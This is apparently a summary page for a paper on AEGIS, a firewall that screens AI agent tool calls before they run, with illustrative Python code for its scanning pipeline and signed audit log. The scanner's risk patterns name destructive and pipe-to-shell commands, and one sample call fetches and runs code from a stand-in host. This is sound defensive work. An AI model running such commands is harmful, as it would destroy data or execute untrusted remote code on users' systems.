🤖 AI Summary
Current AI agents lack a general-purpose pre-execution safety control mechanism when invoking external tools, often leading to uncontrolled high-risk operations. This work proposes the first framework-agnostic pre-execution mediation architecture, which inserts a three-stage safety pipeline ahead of every tool invocation: deep string extraction, content-first risk scanning, and composable policy validation. The design incorporates Ed25519 digital signatures and SHA-256 hash chains to provide a tamper-evident audit trail. Implemented for 14 widely used agent frameworks in Python, JavaScript, and Go, the approach achieves a 100% interception rate on 48 adversarial test cases with only a 1.2% false positive rate over 500 benign invocations, and adds just 8.3 ms of median latency across 1,000 consecutive interceptions, demonstrating strong security guarantees without compromising efficiency or practicality.
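To make the three-stage pipeline concrete, here is a minimal Python sketch of how a pre-execution mediator of this shape could work. All names (`deep_extract`, `scan_content`, `check_policies`, `mediate`), the verdict vocabulary, and the risk patterns are illustrative assumptions, not AEGIS's actual API.

```python
import re

# Illustrative sketch of a three-stage pre-execution mediator.
# Names and patterns are hypothetical, not AEGIS's real interface.

def deep_extract(args):
    """Stage 1: recursively pull every string out of nested tool arguments."""
    if isinstance(args, str):
        yield args
    elif isinstance(args, dict):
        for value in args.values():
            yield from deep_extract(value)
    elif isinstance(args, (list, tuple)):
        for value in args:
            yield from deep_extract(value)

# Stage 2: content-first risk scanning over the extracted strings
# (toy patterns; a real deployment would use a richer rule set).
RISK_PATTERNS = [
    re.compile(r"rm\s+-rf\s+/"),          # destructive shell command
    re.compile(r"DROP\s+TABLE", re.I),    # destructive SQL
    re.compile(r"curl\s+\S+\s*\|\s*sh"),  # pipe-to-shell download
]

def scan_content(strings):
    return [s for s in strings if any(p.search(s) for p in RISK_PATTERNS)]

# Stage 3: composable policy validation. Each policy maps (tool, args) to
# "allow", "deny", or "escalate"; the strictest verdict wins.
def check_policies(tool, args, policies):
    verdicts = {policy(tool, args) for policy in policies}
    for verdict in ("deny", "escalate"):
        if verdict in verdicts:
            return verdict
    return "allow"

def mediate(tool, args, policies):
    """Runs before the executor; only an "allow" verdict reaches the tool."""
    hits = scan_content(list(deep_extract(args)))
    if hits:
        return "deny", hits  # blocked before any side effect occurs
    return check_policies(tool, args, policies), []
```

Under these assumptions, a call like `mediate("shell", {"cmd": "curl evil.sh | sh"}, policies)` is denied at stage 2 before the executor ever sees it, while an "escalate" verdict from stage 3 would correspond to the paper's hold-for-human-approval path.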
📝 Abstract
AI agents increasingly act through external tools: they query databases, execute shell commands, read and write files, and send network requests. Yet in most current agent stacks, model-generated tool calls are handed to the execution layer with no framework-agnostic control point in between. Post-execution observability can record these actions, but it cannot stop them before side effects occur. We present AEGIS, a pre-execution firewall and audit layer for AI agents. AEGIS interposes on the tool-execution path and applies a three-stage pipeline: (i) deep string extraction from tool arguments, (ii) content-first risk scanning, and (iii) composable policy validation. High-risk calls can be held for human approval, and all decisions are recorded in a tamper-evident audit trail based on Ed25519 signatures and SHA-256 hash chaining. In the current implementation, AEGIS supports 14 agent frameworks across Python, JavaScript, and Go with lightweight integration. On a curated suite of 48 attack instances, AEGIS blocks all attacks in the suite before execution; on 500 benign tool calls, it yields a 1.2% false positive rate; and across 1,000 consecutive interceptions, it adds 8.3 ms median latency. The live demo will show end-to-end interception of benign, malicious, and human-escalated tool calls, allowing attendees to observe real-time blocking, approval workflows, and audit-trail generation. These results suggest that pre-execution mediation for AI agents can be practical, low-overhead, and directly deployable.
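The tamper-evident audit trail is the piece most easily misread, so a small sketch may help: each record is SHA-256 hash-chained to its predecessor and Ed25519-signed, so any retroactive edit or deletion invalidates every later hash. The `AuditLog` class and record layout below are our assumptions for illustration; the abstract does not specify AEGIS's actual log format.

```python
import hashlib
import json

from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

GENESIS = "0" * 64  # stand-in hash for the nonexistent predecessor of record 0

class AuditLog:
    """Append-only log: each record is SHA-256-chained and Ed25519-signed."""

    def __init__(self):
        self._key = Ed25519PrivateKey.generate()
        self.public_key = self._key.public_key()
        self.records = []
        self._prev = GENESIS

    def append(self, decision: dict) -> dict:
        # Each record commits to the hash of the previous one, so editing
        # or deleting any entry breaks the chain for every later record.
        body = json.dumps({"prev": self._prev, "decision": decision},
                          sort_keys=True)
        digest = hashlib.sha256(body.encode()).hexdigest()
        record = {"body": body, "hash": digest,
                  "sig": self._key.sign(digest.encode()).hex()}
        self.records.append(record)
        self._prev = digest
        return record

def verify(log: AuditLog) -> bool:
    """Walk the chain; returns False (or raises on a forged signature)
    if any record was altered, removed, or reordered."""
    prev = GENESIS
    for rec in log.records:
        if hashlib.sha256(rec["body"].encode()).hexdigest() != rec["hash"]:
            return False  # record body was altered
        if json.loads(rec["body"])["prev"] != prev:
            return False  # chain link was broken
        # Raises cryptography.exceptions.InvalidSignature if forged.
        log.public_key.verify(bytes.fromhex(rec["sig"]), rec["hash"].encode())
        prev = rec["hash"]
    return True
```

Note the design trade-off this illustrates: hash chaining makes tampering detectable rather than impossible, which is why "tamper-evident" is the accurate term; preventing tampering outright would additionally require anchoring the chain head in external, write-once storage.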